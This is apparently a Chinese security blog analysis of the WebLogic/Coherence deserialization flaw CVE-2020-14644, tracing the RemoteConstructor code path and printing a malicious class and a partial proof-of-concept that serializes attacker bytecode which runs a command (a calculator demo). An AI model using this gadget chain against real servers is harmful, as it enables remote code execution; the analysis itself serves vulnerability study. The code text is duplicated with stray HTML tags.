Weblogic cve-2020-14644 反序列化分析-安全小百科

1 前言

这个漏洞整体来说还算比较简单的，在构造上也几乎没有任何难处，利用上来说是一个标准的反序列化漏洞，需要配合T3协议默认开启才能进行攻击，因此条件上还是有限制的。

这里膜kk师傅，附上参考文章：https://paper.seebug.org/1281/

2 简单分析

出现漏洞的代码位于com.tangosol.internal.util.invoke.RemoteConstructor的第126行

<br />
    public Object readResolve() throws ObjectStreamException {<br />
        return this.newInstance();<br />
    }

public Object readResolve() throws ObjectStreamException {

return this.newInstance();

}

这里跟进newInstance函数

<br />
    public T newInstance() {<br />
        RemotableSupport support = RemotableSupport.get(this.getClassLoader());<br />
        return support.realize(this);<br />
    }

public T newInstance() {

RemotableSupport support = RemotableSupport.get(this.getClassLoader());

return support.realize(this);

}

跟进realize函数

<br />
    public <T> T realize(RemoteConstructor<T> constructor) {<br />
        ClassDefinition definition = this.registerIfAbsent(constructor.getDefinition());<br />
        Class<? extends Remotable> clz = definition.getRemotableClass();<br />
        if (clz == null) {<br />
            synchronized(definition) {<br />
                clz = definition.getRemotableClass();<br />
                if (clz == null) {<br />
                    definition.setRemotableClass(this.defineClass(definition));<br />
                }<br />
            }<br />
        }</p>
<p>        Remotable<T> instance = (Remotable)definition.createInstance(constructor.getArguments());<br />
        instance.setRemoteConstructor(constructor);<br />
        return instance;<br />
    }

public <T> T realize(RemoteConstructor<T> constructor) {

ClassDefinition definition = this.registerIfAbsent(constructor.getDefinition());

Class<? extends Remotable> clz = definition.getRemotableClass();

if (clz == null) {

synchronized(definition) {

clz = definition.getRemotableClass();

if (clz == null) {

definition.setRemotableClass(this.defineClass(definition));

}

Remotable<T> instance = (Remotable)definition.createInstance(constructor.getArguments());

instance.setRemoteConstructor(constructor);

return instance;

}

这里通过getDefinition函数获取ClassDefinition类的定义，然后在下文中进行了类的实例化，也就是definition.createInstance，那么如果这里的definition我们可控，我们就可以通过传入字节码进行类的实例化，并将恶意语句写在类中，实现攻击。

恶意类的poc如下，其中这里对应coherence的版本哈希号，因此在构造时需注意对应的版本号

<br />
package com.tangosol.internal.util.invoke.lambda;</p>
<p>import java.io.IOException;</p>
<p>public class LambdaIdentity$423B02C050017B24DB10DFF759AA56BF{<br />
    public LambdaIdentity$423B02C050017B24DB10DFF759AA56BF() {<br />
    }</p>
<p>    static {<br />
        try {<br />
            Runtime.getRuntime().exec(“open /Applications/Calculator.app”);<br />
        } catch (IOException var1) {<br />
            var1.printStackTrace();<br />
        }<br />
    }<br />
}

package com.tangosol.internal.util.invoke.lambda;

import java.io.IOException;

public class LambdaIdentity$423B02C050017B24DB10DFF759AA56BF{

public LambdaIdentity$423B02C050017B24DB10DFF759AA56BF() {

}

static {

try {

Runtime.getRuntime().exec(“open /Applications/Calculator.app”);

} catch (IOException var1) {

var1.printStackTrace();

}

poc代码如下

<br />
import com.tangosol.internal.util.invoke.ClassDefinition;<br />
import com.tangosol.internal.util.invoke.ClassIdentity;<br />
import com.tangosol.internal.util.invoke.RemoteConstructor;<br />
import com.tangosol.internal.util.invoke.lambda.LambdaIdentity;</p>
<p>import java.io.*;<br />
import java.nio.file.Files;</p>
<p>public class Main {<br />
    public static void main(String[] args) throws Exception{<br />
        File file = new File(“./out/production/cve-2020-14644/com/tangosol/internal/util/invoke/lambda/LambdaIdentity$423B02C050017B24DB10DFF759AA56BF.class”);<br />
        byte[] bytes = Files.readAllBytes( file.toPath());<br />
        RemoteConstructor constructor = new RemoteConstructor(<br />
                new ClassDefinition(new ClassIdentity(LambdaIdentity.class), bytes), new Object[]{}<br />
        );<br />
        File f = new File(“tmp.ser”);<br />
        ObjectOutputStream obj = new ObjectOutputStream(new FileOutputStream(f));<br />
        obj.writeObject(constructor);<br />
        obj.close();</p>
<p>        ObjectInputStream obj1 = new ObjectInputStream(new FileInputStream(f));<br />
        obj1.readObject();<br />
        obj1.close();<br />
    }<br />
}

import com.tangosol.internal.util.invoke.ClassDefinition;

import com.tangosol.internal.util.invoke.ClassIdentity;

import com.tangosol.internal.util.invoke.RemoteConstructor;

import com.tangosol.internal.util.invoke.lambda.LambdaIdentity;

import java.io.*;

import java.nio.file.Files;

public class Main {

public static void main(String[] args) throws Exception{

File file = new File(“./out/production/cve-2020-14644/com/tangosol/internal/util/invoke/lambda/LambdaIdentity$423B02C050017B24DB10DFF759AA56BF.class”);